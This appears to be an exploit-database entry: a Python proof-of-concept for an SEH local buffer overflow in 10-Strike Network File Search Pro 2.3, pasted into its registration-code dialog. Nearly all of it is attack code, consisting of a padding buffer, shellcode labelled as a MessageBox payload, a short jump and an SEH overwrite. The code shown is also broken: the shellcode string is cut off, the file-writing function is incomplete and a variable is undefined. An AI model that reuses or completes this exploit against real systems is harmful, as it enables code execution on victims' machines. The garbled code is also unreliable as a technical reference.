10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow

malwrforensics 10.12.2016 Verified Vulnerable-App
Local Exploits Windows

Exploit Code

# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt

def write_poc(fname, buffer):
	fhandle = open(fname , 'wb')

buf = '\x41' * 0xfe0

# Shellcode
# MessageBox ad infinitum
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"

junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)